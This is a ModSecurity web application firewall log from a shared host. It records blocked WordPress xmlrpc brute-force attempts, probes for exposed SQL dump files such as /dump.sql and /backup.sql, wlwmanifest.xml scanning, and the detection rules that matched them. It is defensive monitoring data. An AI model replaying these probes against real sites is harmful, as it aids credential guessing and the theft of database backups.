[Tue May 26 19:31:40.735972 2026] [security2:error] [pid 58470:tid 58669] [client 91.245.236.124:54349] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnxLnjVHRH3AGGvmb_WwAAAEU"]
[Tue May 26 19:31:41.518476 2026] [security2:error] [pid 58470:tid 58693] [client 91.245.236.124:18907] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnxbnjVHRH3AGGvmb_bgAAAF0"]
[Tue May 26 19:31:41.518679 2026] [security2:error] [pid 58470:tid 58693] [client 91.245.236.124:18907] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnxbnjVHRH3AGGvmb_bgAAAF0"]
[Tue May 26 19:31:41.638553 2026] [security2:error] [pid 58470:tid 58657] [client 168.144.82.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/index.php"] [unique_id "ahWnxbnjVHRH3AGGvmb_XgAAADk"], referer: https://sebiregisteredadvisor.jiyani.in/
[Tue May 26 19:31:42.240232 2026] [security2:error] [pid 58470:tid 58710] [client 100.35.203.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnxbnjVHRH3AGGvmb_dAAAAG4"]
[Tue May 26 19:31:42.294784 2026] [security2:error] [pid 58470:tid 58630] [client 91.245.236.124:42927] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnxrnjVHRH3AGGvmb_ggAAAB4"]
[Tue May 26 19:31:42.294897 2026] [security2:error] [pid 58470:tid 58630] [client 91.245.236.124:42927] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnxrnjVHRH3AGGvmb_ggAAAB4"]
[Tue May 26 19:31:42.434108 2026] [security2:error] [pid 58470:tid 58660] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnxrnjVHRH3AGGvmb_dwAAADw"]
[Tue May 26 19:31:42.991987 2026] [security2:error] [pid 58470:tid 58480] [remote 74.7.241.58:57750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWnxrnjVHRH3AGGvmb_lAAAAgk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:31:43.060650 2026] [security2:error] [pid 58470:tid 58605] [client 91.245.236.124:49997] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnx7njVHRH3AGGvmb_lQAAAAU"]
[Tue May 26 19:31:43.060759 2026] [security2:error] [pid 58470:tid 58605] [client 91.245.236.124:49997] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnx7njVHRH3AGGvmb_lQAAAAU"]
[Tue May 26 19:31:43.825088 2026] [security2:error] [pid 58470:tid 58655] [client 91.245.236.124:38999] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnx7njVHRH3AGGvmb_qwAAADc"]
[Tue May 26 19:31:43.825227 2026] [security2:error] [pid 58470:tid 58655] [client 91.245.236.124:38999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnx7njVHRH3AGGvmb_qwAAADc"]
[Tue May 26 19:31:44.574945 2026] [security2:error] [pid 58470:tid 58673] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnyLnjVHRH3AGGvmb_tQAAAEk"]
[Tue May 26 19:31:44.607348 2026] [security2:error] [pid 58470:tid 58723] [client 91.245.236.124:18419] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnyLnjVHRH3AGGvmb_yAAAAHs"]
[Tue May 26 19:31:44.607485 2026] [security2:error] [pid 58470:tid 58723] [client 91.245.236.124:18419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnyLnjVHRH3AGGvmb_yAAAAHs"]
[Tue May 26 19:31:44.625390 2026] [security2:error] [pid 58470:tid 58485] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/database.sql"] [unique_id "ahWnyLnjVHRH3AGGvmb_yQAACg4"]
[Tue May 26 19:31:44.945081 2026] [security2:error] [pid 58470:tid 58487] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/dump.sql"] [unique_id "ahWnyLnjVHRH3AGGvmb_zQAACxA"]
[Tue May 26 19:31:45.166440 2026] [security2:error] [pid 58470:tid 58490] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/backup.sql"] [unique_id "ahWnybnjVHRH3AGGvmb_1AAAUxM"]
[Tue May 26 19:31:45.370088 2026] [security2:error] [pid 58470:tid 58662] [client 91.245.236.124:10911] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnybnjVHRH3AGGvmb_2QAAAD4"]
[Tue May 26 19:31:45.370199 2026] [security2:error] [pid 58470:tid 58662] [client 91.245.236.124:10911] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnybnjVHRH3AGGvmb_2QAAAD4"]
[Tue May 26 19:31:45.392711 2026] [security2:error] [pid 58470:tid 58489] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/db.sql"] [unique_id "ahWnybnjVHRH3AGGvmb_2gAAMxI"]
[Tue May 26 19:31:46.149198 2026] [security2:error] [pid 58470:tid 58701] [client 91.245.236.124:44157] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnyrnjVHRH3AGGvmb_8gAAAGU"]
[Tue May 26 19:31:46.149293 2026] [security2:error] [pid 58470:tid 58701] [client 91.245.236.124:44157] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnyrnjVHRH3AGGvmb_8gAAAGU"]
[Tue May 26 19:31:46.784543 2026] [security2:error] [pid 58470:tid 58723] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnyrnjVHRH3AGGvmb_-QAAAHs"]
[Tue May 26 19:31:47.083779 2026] [security2:error] [pid 58470:tid 58694] [client 91.245.236.124:45989] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWny7njVHRH3AGGvmYAEgAAAF4"]
[Tue May 26 19:31:47.083920 2026] [security2:error] [pid 58470:tid 58694] [client 91.245.236.124:45989] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWny7njVHRH3AGGvmYAEgAAAF4"]
[Tue May 26 19:31:47.865023 2026] [security2:error] [pid 58470:tid 58661] [client 91.245.236.124:63911] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWny7njVHRH3AGGvmYAMQAAAD0"]
[Tue May 26 19:31:47.865142 2026] [security2:error] [pid 58470:tid 58661] [client 91.245.236.124:63911] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWny7njVHRH3AGGvmYAMQAAAD0"]
[Tue May 26 19:31:48.223362 2026] [security2:error] [pid 58470:tid 58648] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWny7njVHRH3AGGvmYALQAAADA"]
[Tue May 26 19:31:48.414125 2026] [security2:error] [pid 58470:tid 58638] [client 45.154.98.214:52899] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzLnjVHRH3AGGvmYARAAAACY"]
[Tue May 26 19:31:48.644742 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:31737] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzLnjVHRH3AGGvmYASwAAABY"]
[Tue May 26 19:31:48.644869 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:31737] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzLnjVHRH3AGGvmYASwAAABY"]
[Tue May 26 19:31:48.885786 2026] [security2:error] [pid 58470:tid 58659] [client 45.154.98.214:61498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzLnjVHRH3AGGvmYATgAAADs"]
[Tue May 26 19:31:49.174466 2026] [security2:error] [pid 58470:tid 58516] [remote 5.39.1.240:39528] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "consola.co"] [uri "/robots.txt"] [unique_id "ahWnzbnjVHRH3AGGvmYAXAAAOC0"]
[Tue May 26 19:31:49.174694 2026] [security2:error] [pid 58470:tid 58656] [client 5.39.1.240:39528] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "consola.co"] [uri "/robots.txt"] [unique_id "ahWnzbnjVHRH3AGGvmYAXAAAOC0"]
[Tue May 26 19:31:49.335907 2026] [security2:error] [pid 58470:tid 58722] [client 45.154.98.214:63900] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzbnjVHRH3AGGvmYAZQAAAHo"]
[Tue May 26 19:31:49.424379 2026] [security2:error] [pid 58470:tid 58618] [client 91.245.236.124:39851] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzbnjVHRH3AGGvmYAaQAAABI"]
[Tue May 26 19:31:49.424504 2026] [security2:error] [pid 58470:tid 58618] [client 91.245.236.124:39851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzbnjVHRH3AGGvmYAaQAAABI"]
[Tue May 26 19:31:49.633970 2026] [security2:error] [pid 58470:tid 58692] [client 45.154.98.214:62221] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzbnjVHRH3AGGvmYAagAAAFw"]
[Tue May 26 19:31:49.947050 2026] [security2:error] [pid 58470:tid 58726] [client 45.154.98.214:65426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzbnjVHRH3AGGvmYAcgAAAH4"]
[Tue May 26 19:31:50.256531 2026] [security2:error] [pid 58470:tid 58702] [client 45.154.98.214:53797] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzrnjVHRH3AGGvmYAfAAAAGY"]
[Tue May 26 19:31:50.428135 2026] [security2:error] [pid 58470:tid 58657] [client 91.245.236.124:65401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzrnjVHRH3AGGvmYAegAAADk"]
[Tue May 26 19:31:50.428281 2026] [security2:error] [pid 58470:tid 58657] [client 91.245.236.124:65401] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnzrnjVHRH3AGGvmYAegAAADk"]
[Tue May 26 19:31:50.548319 2026] [security2:error] [pid 58470:tid 58622] [client 45.154.98.214:58278] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzrnjVHRH3AGGvmYAggAAABY"]
[Tue May 26 19:31:50.737869 2026] [security2:error] [pid 58470:tid 58510] [remote 142.44.233.4:60200] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "consola.co"] [uri "/"] [unique_id "ahWnzrnjVHRH3AGGvmYAjAAARic"]
[Tue May 26 19:31:50.739942 2026] [security2:error] [pid 58470:tid 58670] [client 142.44.233.4:60200] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "consola.co"] [uri "/"] [unique_id "ahWnzrnjVHRH3AGGvmYAjAAARic"]
[Tue May 26 19:31:50.847985 2026] [security2:error] [pid 58470:tid 58629] [client 45.154.98.214:64574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWnzrnjVHRH3AGGvmYAkQAAAB0"]
[Tue May 26 19:31:51.146768 2026] [security2:error] [pid 58470:tid 58678] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnzrnjVHRH3AGGvmYAiwAAAE4"]
[Tue May 26 19:31:51.153388 2026] [security2:error] [pid 58470:tid 58655] [client 45.154.98.214:64183] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWnz7njVHRH3AGGvmYAnAAAADc"]
[Tue May 26 19:31:51.200955 2026] [security2:error] [pid 58470:tid 58653] [client 91.245.236.124:62631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnz7njVHRH3AGGvmYAnQAAADU"]
[Tue May 26 19:31:51.201100 2026] [security2:error] [pid 58470:tid 58653] [client 91.245.236.124:62631] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnz7njVHRH3AGGvmYAnQAAADU"]
[Tue May 26 19:31:51.456185 2026] [security2:error] [pid 58470:tid 58727] [client 45.154.98.214:60184] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWnz7njVHRH3AGGvmYAqAAAAH8"]
[Tue May 26 19:31:51.750693 2026] [security2:error] [pid 58470:tid 58702] [client 45.154.98.214:53494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWnz7njVHRH3AGGvmYAsQAAAGY"]
[Tue May 26 19:31:51.897097 2026] [security2:error] [pid 58470:tid 58624] [client 185.191.171.18:49496] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2023-08-28/"] [unique_id "ahWnz7njVHRH3AGGvmYAtwAAABg"]
[Tue May 26 19:31:51.897217 2026] [security2:error] [pid 58470:tid 58624] [client 185.191.171.18:49496] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2023-08-28/"] [unique_id "ahWnz7njVHRH3AGGvmYAtwAAABg"]
[Tue May 26 19:31:51.985601 2026] [security2:error] [pid 58470:tid 58724] [client 91.245.236.124:56995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnz7njVHRH3AGGvmYAvgAAAHw"]
[Tue May 26 19:31:51.985743 2026] [security2:error] [pid 58470:tid 58724] [client 91.245.236.124:56995] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnz7njVHRH3AGGvmYAvgAAAHw"]
[Tue May 26 19:31:52.054689 2026] [security2:error] [pid 58470:tid 58613] [client 45.154.98.214:62824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWn0LnjVHRH3AGGvmYAxAAAAA0"]
[Tue May 26 19:31:52.216214 2026] [security2:error] [pid 58470:tid 58515] [remote 216.251.35.203:27918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn0LnjVHRH3AGGvmYAwgAAKyw"]
[Tue May 26 19:31:52.356399 2026] [security2:error] [pid 58470:tid 58627] [client 45.154.98.214:60278] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWn0LnjVHRH3AGGvmYAxgAAABs"]
[Tue May 26 19:31:52.404703 2026] [security2:error] [pid 58470:tid 58525] [remote 216.251.35.203:27918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn0LnjVHRH3AGGvmYAywAAbzY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:31:52.671135 2026] [security2:error] [pid 58470:tid 58686] [client 45.154.98.214:58015] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "omshriinfrastructures.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWn0LnjVHRH3AGGvmYA0QAAAFY"]
